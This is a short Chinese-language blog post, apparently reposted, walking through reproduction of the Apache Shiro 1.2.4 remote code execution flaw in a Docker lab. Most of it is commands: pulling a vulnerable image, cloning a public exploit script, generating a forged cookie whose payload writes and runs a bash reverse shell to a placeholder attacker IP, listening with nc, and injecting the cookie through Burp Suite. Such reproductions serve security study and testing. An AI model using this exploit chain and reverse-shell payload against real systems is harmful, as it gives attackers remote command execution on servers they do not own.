Apache Shiro 小於1.2.4 RCE 漏洞復現


1.首先說一句這破漏洞折騰了好久,才復現成功

環境搭建docker

####獲取docker鏡像

docker pull medicean/vulapps:s_shiro_1

####重啟docker

systemctl restart docker

####啟動docker鏡像:

docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1

訪問:

http://localhost:8081/ 環境搭建成功

 

 2.下載攻擊exp

git clone https://github.com/acgbfull/Apache_Shiro_1.2.4_RCE.git

 首先生成一個偽造的cookie

root@Mke:~/Apache_Shiro_1.2.4_RCE# python3 shiro_1.2.4.py "echo '/bin/bash -i >& /dev/tcp/x.x.x.x/8088 0>&1' >> a.txt &&bash a.txt"

注意:這里我這樣寫的原因是因為之前復現好幾次,都無法反彈shell,最后不得已這樣寫,先把反彈shell寫入a.txt,然后再執行反彈shell的操作

 

3.監聽反彈的端口

nc -lvp 8088

 

 4.登入shiro然后用burpsuite抓取數據包

 

 

burpsuite抓包然后進行替換cookie

 

替換cookie

 

5.查看監聽端口,是否有shell彈回來

 到這里算是復現成功了(qieyiweinabudaoxitongkongzhiquanxianjiubusuanfuxianchenggong!!!)

 

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM